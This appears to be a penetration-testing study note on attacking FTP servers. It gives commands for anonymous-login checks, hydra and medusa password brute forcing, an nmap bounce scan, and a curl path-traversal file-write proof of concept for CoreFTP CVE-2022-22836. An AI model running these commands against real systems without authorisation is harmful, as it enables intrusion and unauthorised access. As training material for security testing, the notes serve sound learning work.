> See FTP Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/FTP (20,21)|FTP (20,21)]] # Introduction - File Transfer Protocol (FTP) listens on TCP/21 by default - To attack an FTP Server, we can abuse misconfiguration or excessive privileges, exploit known vulnerabilities or discover new vulnerabilities # Enumeration ```bash sudo nmap -sC -sV -p21 <target_ip> ``` # Misconfigurations - Check for anonymous login ```bash ftp <target_ip> #anonymous login command nxc ftp <target_ip> -u '' -p '' wget -m --no-passive ftp://anonymous:anonymous@<target_IP> #pull all files with anon login ``` # Connecting to FTP ```bash ftp <user_name>:<password>@<target_ip> <alt_port> #optionally specify user, password, and alt port number nc -nv <target_ip> 21 telnet <target_ip> 21 openssl s_client -connect <target_ip> -starttls ftp ``` # FTP Attacks ## Brute Forcing ```bash medusa -u <username> -P /usr/share/wordlists/rockyou.txt -h <target_ip> -M ftp -n <alt_port> hydra -L users.list -p <password> ftp://<target_ip> -s <alt_port> #both can use a username/user list and a password/password list ``` ## Bounce Attack - Use an open FTP server as a proxy to scan a second-order machine connected to the FTP server - Nearly all modern FTP servers block this attack - Nmap common scripts will check for this attack vector ![[images/Pasted image 20251016111217.png]] ```bash #use -b flag for bounce attack nmap -Pn -v -n -p80 -b anonymous:password@<target_ftp_server> <final_target_ip> ``` ## CoreFTP Exploit - Associated with `CoreFTP` before build 727 vulnerability assigned [CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836) - Vuln: FTP service that does not correctly process the `HTTP PUT` request and leads to an `authenticated directory`/`path traversal,` and `arbitrary file write`  ```bash curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops #create file whoops with content: PoC. ```